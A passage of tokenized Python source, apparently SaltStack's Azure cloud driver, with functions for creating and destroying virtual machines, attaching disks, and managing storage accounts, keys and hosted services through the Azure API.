list_nodes_select ( <EOL> list_nodes_full ( conn , '<STR_LIT>' ) , __opts__ [ '<STR_LIT>' ] , call , <EOL> ) <EOL> def show_instance ( name , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> nodes = list_nodes_full ( ) <EOL> if name not in nodes : <EOL> return { } <EOL> salt . utils . cloud . cache_node ( nodes [ name ] , __active_provider_name__ , __opts__ ) <EOL> return nodes [ name ] <EOL> def create ( vm_ ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> if vm_ [ '<STR_LIT>' ] and config . is_profile_configured ( __opts__ , <EOL> __active_provider_name__ or '<STR_LIT>' , <EOL> vm_ [ '<STR_LIT>' ] , <EOL> vm_ = vm_ ) is False : <EOL> return False <EOL> except AttributeError : <EOL> pass <EOL> if '<STR_LIT>' in vm_ : <EOL> vm_ [ '<STR_LIT>' ] = vm_ . pop ( '<STR_LIT>' ) <EOL> salt . utils . cloud . fire_event ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) , <EOL> { <EOL> '<STR_LIT:name>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> } , <EOL> transport = __opts__ [ '<STR_LIT>' ] <EOL> ) <EOL> log . info ( '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) ) <EOL> conn = get_conn ( ) <EOL> label = vm_ . get ( '<STR_LIT:label>' , vm_ [ '<STR_LIT:name>' ] ) <EOL> service_name = vm_ . get ( '<STR_LIT>' , vm_ [ '<STR_LIT:name>' ] ) <EOL> service_kwargs = { <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT:label>' : label , <EOL> '<STR_LIT:description>' : vm_ . 
get ( '<STR_LIT>' , vm_ [ '<STR_LIT:name>' ] ) , <EOL> } <EOL> loc_error = False <EOL> if '<STR_LIT:location>' in vm_ : <EOL> if '<STR_LIT>' in vm_ : <EOL> loc_error = True <EOL> else : <EOL> service_kwargs [ '<STR_LIT:location>' ] = vm_ [ '<STR_LIT:location>' ] <EOL> elif '<STR_LIT>' in vm_ : <EOL> service_kwargs [ '<STR_LIT>' ] = vm_ [ '<STR_LIT>' ] <EOL> else : <EOL> loc_error = True <EOL> if loc_error : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> ssh_port = config . get_cloud_config_value ( '<STR_LIT:port>' , vm_ , __opts__ , <EOL> default = '<STR_LIT>' , search_global = True ) <EOL> ssh_endpoint = azure . servicemanagement . ConfigurationSetInputEndpoint ( <EOL> name = '<STR_LIT>' , <EOL> protocol = '<STR_LIT>' , <EOL> port = ssh_port , <EOL> local_port = '<STR_LIT>' , <EOL> ) <EOL> network_config = azure . servicemanagement . ConfigurationSet ( ) <EOL> network_config . input_endpoints . input_endpoints . append ( ssh_endpoint ) <EOL> network_config . configuration_set_type = '<STR_LIT>' <EOL> if '<STR_LIT>' in vm_ : <EOL> system_config = azure . servicemanagement . WindowsConfigurationSet ( <EOL> computer_name = vm_ [ '<STR_LIT:name>' ] , <EOL> admin_username = vm_ [ '<STR_LIT>' ] , <EOL> admin_password = vm_ [ '<STR_LIT>' ] , <EOL> ) <EOL> smb_port = '<STR_LIT>' <EOL> if '<STR_LIT>' in vm_ : <EOL> smb_port = vm_ [ '<STR_LIT>' ] <EOL> smb_endpoint = azure . servicemanagement . ConfigurationSetInputEndpoint ( <EOL> name = '<STR_LIT>' , <EOL> protocol = '<STR_LIT>' , <EOL> port = smb_port , <EOL> local_port = smb_port , <EOL> ) <EOL> network_config . input_endpoints . input_endpoints . append ( smb_endpoint ) <EOL> system_config . domain_join = None <EOL> system_config . win_rm = None <EOL> else : <EOL> system_config = azure . servicemanagement . 
LinuxConfigurationSet ( <EOL> host_name = vm_ [ '<STR_LIT:name>' ] , <EOL> user_name = vm_ [ '<STR_LIT>' ] , <EOL> user_password = vm_ [ '<STR_LIT>' ] , <EOL> disable_ssh_password_authentication = False , <EOL> ) <EOL> media_link = vm_ [ '<STR_LIT>' ] <EOL> media_link += '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) <EOL> os_hd = azure . servicemanagement . OSVirtualHardDisk ( vm_ [ '<STR_LIT:image>' ] , media_link ) <EOL> vm_kwargs = { <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> '<STR_LIT:label>' : label , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : system_config , <EOL> '<STR_LIT>' : os_hd , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT:size>' ] , <EOL> '<STR_LIT>' : network_config , <EOL> } <EOL> if '<STR_LIT>' in vm_ : <EOL> vm_kwargs [ '<STR_LIT>' ] = vm_ [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in vm_ : <EOL> network_config . subnet_names . append ( vm_ [ '<STR_LIT>' ] ) <EOL> log . debug ( '<STR_LIT>' . format ( vm_kwargs ) ) <EOL> event_kwargs = { '<STR_LIT>' : service_kwargs . copy ( ) , <EOL> '<STR_LIT>' : vm_kwargs . copy ( ) } <EOL> del event_kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> del event_kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> del event_kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> salt . utils . cloud . fire_event ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) , <EOL> event_kwargs , <EOL> transport = __opts__ [ '<STR_LIT>' ] <EOL> ) <EOL> log . debug ( '<STR_LIT>' . format ( vm_kwargs ) ) <EOL> try : <EOL> conn . create_hosted_service ( ** service_kwargs ) <EOL> except AzureConflictHttpError : <EOL> log . debug ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> error = '<STR_LIT>' <EOL> if error in str ( exc ) : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_ [ '<STR_LIT:name>' ] <EOL> ) , <EOL> exc_info_on_loglevel = logging . 
DEBUG <EOL> ) <EOL> else : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_ [ '<STR_LIT:name>' ] , str ( exc ) <EOL> ) , <EOL> exc_info_on_loglevel = logging . DEBUG <EOL> ) <EOL> return False <EOL> try : <EOL> result = conn . create_virtual_machine_deployment ( ** vm_kwargs ) <EOL> log . debug ( '<STR_LIT>' . format ( result . request_id ) ) <EOL> _wait_for_async ( conn , result . request_id ) <EOL> except AzureConflictHttpError : <EOL> log . debug ( '<STR_LIT>' ) <EOL> del vm_kwargs [ '<STR_LIT>' ] <EOL> del vm_kwargs [ '<STR_LIT:label>' ] <EOL> del vm_kwargs [ '<STR_LIT>' ] <EOL> result = conn . add_role ( ** vm_kwargs ) <EOL> _wait_for_async ( conn , result . request_id ) <EOL> except Exception as exc : <EOL> error = '<STR_LIT>' <EOL> if error in str ( exc ) : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_ [ '<STR_LIT:name>' ] <EOL> ) , <EOL> exc_info_on_loglevel = logging . DEBUG <EOL> ) <EOL> else : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_ [ '<STR_LIT:name>' ] , str ( exc ) <EOL> ) , <EOL> exc_info_on_loglevel = logging . DEBUG <EOL> ) <EOL> return False <EOL> def wait_for_hostname ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> conn . get_role ( service_name , service_name , vm_ [ '<STR_LIT:name>' ] ) <EOL> data = show_instance ( vm_ [ '<STR_LIT:name>' ] , call = '<STR_LIT:action>' ) <EOL> if '<STR_LIT:url>' in data and data [ '<STR_LIT:url>' ] != str ( '<STR_LIT>' ) : <EOL> return data [ '<STR_LIT:url>' ] <EOL> except AzureMissingResourceHttpError : <EOL> pass <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> return False <EOL> hostname = salt . utils . cloud . wait_for_fun ( <EOL> wait_for_hostname , <EOL> timeout = config . 
get_cloud_config_value ( <EOL> '<STR_LIT>' , vm_ , __opts__ , default = <NUM_LIT:15> * <NUM_LIT> ) , <EOL> ) <EOL> if not hostname : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> vm_ [ '<STR_LIT>' ] = hostname . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> vm_ [ '<STR_LIT:password>' ] = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , vm_ , __opts__ <EOL> ) <EOL> ret = salt . utils . cloud . bootstrap ( vm_ , __opts__ ) <EOL> volumes = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , vm_ , __opts__ , search_global = True <EOL> ) <EOL> if volumes : <EOL> salt . utils . cloud . fire_event ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) , <EOL> { '<STR_LIT>' : volumes } , <EOL> transport = __opts__ [ '<STR_LIT>' ] <EOL> ) <EOL> log . info ( '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) ) <EOL> created = create_attach_volumes ( <EOL> vm_ [ '<STR_LIT:name>' ] , <EOL> { <EOL> '<STR_LIT>' : volumes , <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : media_link , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : vm_ . get ( '<STR_LIT>' , False ) <EOL> } , <EOL> call = '<STR_LIT:action>' <EOL> ) <EOL> ret [ '<STR_LIT>' ] = created <EOL> data = show_instance ( vm_ [ '<STR_LIT:name>' ] , call = '<STR_LIT:action>' ) <EOL> log . info ( '<STR_LIT>' . format ( vm_ ) ) <EOL> log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> vm_ , pprint . pformat ( data ) <EOL> ) <EOL> ) <EOL> ret . update ( data ) <EOL> salt . utils . cloud . fire_event ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . 
format ( vm_ [ '<STR_LIT:name>' ] ) , <EOL> { <EOL> '<STR_LIT:name>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> } , <EOL> transport = __opts__ [ '<STR_LIT>' ] <EOL> ) <EOL> return ret <EOL> def create_attach_volumes ( name , kwargs , call = None , wait_to_finish = True ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if isinstance ( kwargs [ '<STR_LIT>' ] , str ) : <EOL> volumes = yaml . safe_load ( kwargs [ '<STR_LIT>' ] ) <EOL> else : <EOL> volumes = kwargs [ '<STR_LIT>' ] <EOL> conn = get_conn ( ) <EOL> ret = [ ] <EOL> for volume in volumes : <EOL> if "<STR_LIT>" in volume : <EOL> log . error ( "<STR_LIT>" ) <EOL> return False <EOL> volume . setdefault ( "<STR_LIT>" , volume . get ( "<STR_LIT:size>" , <NUM_LIT:100> ) ) <EOL> volume . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> volume . setdefault ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> volume . setdefault ( "<STR_LIT>" , <EOL> kwargs [ "<STR_LIT>" ] [ : - <NUM_LIT:4> ] + "<STR_LIT>" . format ( volume [ "<STR_LIT>" ] ) ) <EOL> volume . setdefault ( "<STR_LIT>" , <EOL> kwargs [ "<STR_LIT>" ] + "<STR_LIT>" . format ( volume [ "<STR_LIT>" ] ) ) <EOL> volume_dict = { <EOL> '<STR_LIT>' : volume [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : volume [ "<STR_LIT>" ] <EOL> } <EOL> kwargs_add_data_disk = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> for key in set ( volume . keys ( ) ) - set ( kwargs_add_data_disk ) : <EOL> del volume [ key ] <EOL> attach = conn . add_data_disk ( kwargs [ "<STR_LIT>" ] , kwargs [ "<STR_LIT>" ] , kwargs [ "<STR_LIT>" ] , <EOL> ** volume ) <EOL> log . debug ( attach ) <EOL> if attach : <EOL> msg = ( <EOL> '<STR_LIT>' . 
format ( <EOL> volume_dict [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> name , <EOL> ) <EOL> ) <EOL> log . info ( msg ) <EOL> ret . append ( msg ) <EOL> else : <EOL> log . error ( '<STR_LIT>' . format ( volume_dict ) ) <EOL> return ret <EOL> def create_attach_volumes ( name , kwargs , call = None , wait_to_finish = True ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if isinstance ( kwargs [ '<STR_LIT>' ] , str ) : <EOL> volumes = yaml . safe_load ( kwargs [ '<STR_LIT>' ] ) <EOL> else : <EOL> volumes = kwargs [ '<STR_LIT>' ] <EOL> conn = get_conn ( ) <EOL> ret = [ ] <EOL> for volume in volumes : <EOL> if "<STR_LIT>" in volume : <EOL> log . error ( "<STR_LIT>" ) <EOL> return False <EOL> volume . setdefault ( "<STR_LIT>" , volume . get ( "<STR_LIT:size>" , <NUM_LIT:100> ) ) <EOL> volume . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> volume . setdefault ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> volume . setdefault ( "<STR_LIT>" , <EOL> kwargs [ "<STR_LIT>" ] [ : - <NUM_LIT:4> ] + "<STR_LIT>" . format ( volume [ "<STR_LIT>" ] ) ) <EOL> volume . setdefault ( "<STR_LIT>" , <EOL> kwargs [ "<STR_LIT>" ] + "<STR_LIT>" . format ( volume [ "<STR_LIT>" ] ) ) <EOL> volume_dict = { <EOL> '<STR_LIT>' : volume [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : volume [ "<STR_LIT>" ] <EOL> } <EOL> kwargs_add_data_disk = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> for key in set ( volume . keys ( ) ) - set ( kwargs_add_data_disk ) : <EOL> del volume [ key ] <EOL> result = conn . add_data_disk ( kwargs [ "<STR_LIT>" ] , <EOL> kwargs [ "<STR_LIT>" ] , <EOL> kwargs [ "<STR_LIT>" ] , <EOL> ** volume ) <EOL> _wait_for_async ( conn , result . request_id ) <EOL> msg = ( <EOL> '<STR_LIT>' . 
format ( <EOL> volume_dict [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> name ) <EOL> ) <EOL> log . info ( msg ) <EOL> ret . append ( msg ) <EOL> return ret <EOL> def _wait_for_async ( conn , request_id ) : <EOL> '''<STR_LIT>''' <EOL> count = <NUM_LIT:0> <EOL> log . debug ( '<STR_LIT>' ) <EOL> result = conn . get_operation_status ( request_id ) <EOL> while result . status == '<STR_LIT>' : <EOL> count = count + <NUM_LIT:1> <EOL> if count > <NUM_LIT> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> result = conn . get_operation_status ( request_id ) <EOL> if result . status != '<STR_LIT>' : <EOL> raise AzureException ( '<STR_LIT>' <EOL> . format ( message = result . error . message , <EOL> code = result . error . code ) ) <EOL> def destroy ( name , conn = None , call = None , kwargs = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> instance_data = show_instance ( name , call = '<STR_LIT:action>' ) <EOL> service_name = instance_data [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] <EOL> disk_name = instance_data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> ret = { } <EOL> try : <EOL> log . debug ( '<STR_LIT>' ) <EOL> result = conn . delete_role ( service_name , service_name , name ) <EOL> delete_type = '<STR_LIT>' <EOL> except AzureException : <EOL> log . debug ( '<STR_LIT>' ) <EOL> try : <EOL> result = conn . delete_deployment ( service_name , service_name ) <EOL> except AzureConflictHttpError as exc : <EOL> log . error ( exc . message ) <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( name , exc . message ) ) <EOL> delete_type = '<STR_LIT>' <EOL> _wait_for_async ( conn , result . request_id ) <EOL> ret [ name ] = { <EOL> delete_type : { '<STR_LIT>' : result . request_id } , <EOL> } <EOL> if __opts__ . 
get ( '<STR_LIT>' , False ) is True : <EOL> salt . utils . cloud . delete_minion_cachedir ( name , __active_provider_name__ . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] , __opts__ ) <EOL> cleanup_disks = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , default = False , <EOL> ) <EOL> if cleanup_disks : <EOL> cleanup_vhds = kwargs . get ( '<STR_LIT>' , config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , default = False , <EOL> ) ) <EOL> log . debug ( '<STR_LIT>' . format ( disk_name ) ) <EOL> if cleanup_vhds : <EOL> log . debug ( '<STR_LIT>' ) <EOL> def wait_for_destroy ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> data = delete_disk ( kwargs = { '<STR_LIT:name>' : disk_name , '<STR_LIT>' : cleanup_vhds } , call = '<STR_LIT>' ) <EOL> return data <EOL> except AzureConflictHttpError : <EOL> log . debug ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> return False <EOL> data = salt . utils . cloud . wait_for_fun ( <EOL> wait_for_destroy , <EOL> timeout = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , { } , __opts__ , default = <NUM_LIT:15> * <NUM_LIT> ) , <EOL> ) <EOL> ret [ name ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:name>' : disk_name , <EOL> '<STR_LIT>' : cleanup_vhds , <EOL> '<STR_LIT:data>' : data <EOL> } <EOL> cleanup_services = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , default = False <EOL> ) <EOL> if cleanup_services : <EOL> log . debug ( '<STR_LIT>' . format ( service_name ) ) <EOL> def wait_for_disk_delete ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> data = delete_service ( kwargs = { '<STR_LIT:name>' : service_name } , call = '<STR_LIT>' ) <EOL> return data <EOL> except AzureConflictHttpError : <EOL> log . debug ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> return False <EOL> data = salt . utils . cloud . 
wait_for_fun ( <EOL> wait_for_disk_delete , <EOL> timeout = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , { } , __opts__ , default = <NUM_LIT:15> * <NUM_LIT> ) , <EOL> ) <EOL> ret [ name ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:name>' : service_name , <EOL> '<STR_LIT:data>' : data <EOL> } <EOL> return ret <EOL> def list_storage_services ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> accounts = conn . list_storage_accounts ( ) <EOL> for service in accounts . storage_services : <EOL> ret [ service . service_name ] = { <EOL> '<STR_LIT>' : service . capabilities , <EOL> '<STR_LIT>' : service . service_name , <EOL> '<STR_LIT>' : service . storage_service_properties , <EOL> '<STR_LIT>' : service . extended_properties , <EOL> '<STR_LIT>' : service . storage_service_keys , <EOL> '<STR_LIT:url>' : service . url , <EOL> } <EOL> return ret <EOL> def get_operation_status ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:id>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . get_operation_status ( kwargs [ '<STR_LIT:id>' ] ) <EOL> ret = { <EOL> '<STR_LIT>' : data . http_status_code , <EOL> '<STR_LIT:id>' : kwargs [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:status>' : data . status <EOL> } <EOL> if hasattr ( data . error , '<STR_LIT:code>' ) : <EOL> ret [ '<STR_LIT:error>' ] = { <EOL> '<STR_LIT:code>' : data . error . code , <EOL> '<STR_LIT:message>' : data . error . 
message , <EOL> } <EOL> return ret <EOL> def list_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_storage_accounts ( ) <EOL> pprint . pprint ( dir ( data ) ) <EOL> ret = { } <EOL> for item in data . storage_services : <EOL> ret [ item . service_name ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_storage_account_properties ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> ) <EOL> return object_to_dict ( data ) <EOL> get_storage = show_storage <EOL> def show_storage_keys ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> data = conn . get_storage_account_keys ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> ) <EOL> except AzureMissingResourceHttpError as exc : <EOL> storage_data = show_storage ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> if storage_data [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] == '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> else : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . 
message ) ) <EOL> return object_to_dict ( data ) <EOL> get_storage_keys = show_storage_keys <EOL> def create_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:description>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:label>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:location>' not in kwargs and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> data = conn . create_storage_account ( <EOL> service_name = kwargs [ '<STR_LIT:name>' ] , <EOL> label = kwargs [ '<STR_LIT:label>' ] , <EOL> description = kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> location = kwargs . get ( '<STR_LIT:location>' , None ) , <EOL> affinity_group = kwargs . get ( '<STR_LIT>' , None ) , <EOL> extended_properties = kwargs . get ( '<STR_LIT>' , None ) , <EOL> geo_replication_enabled = kwargs . get ( '<STR_LIT>' , None ) , <EOL> account_type = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def update_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . update_storage_account ( <EOL> service_name = kwargs [ '<STR_LIT:name>' ] , <EOL> label = kwargs . 
get ( '<STR_LIT:label>' , None ) , <EOL> description = kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> extended_properties = kwargs . get ( '<STR_LIT>' , None ) , <EOL> geo_replication_enabled = kwargs . get ( '<STR_LIT>' , None ) , <EOL> account_type = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> return show_storage ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> def regenerate_storage_keys ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs or kwargs [ '<STR_LIT>' ] not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> data = conn . regenerate_storage_account_keys ( <EOL> service_name = kwargs [ '<STR_LIT:name>' ] , <EOL> key_type = kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> return show_storage_keys ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def delete_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> data = conn . delete_storage_account ( kwargs [ '<STR_LIT:name>' ] ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . 
message ) ) <EOL> def list_services ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_hosted_services ( ) <EOL> ret = { } <EOL> for item in data . hosted_services : <EOL> ret [ item . service_name ] = object_to_dict ( item ) <EOL> ret [ item . service_name ] [ '<STR_LIT:name>' ] = item . service_name <EOL> return ret <EOL> def show_service ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in 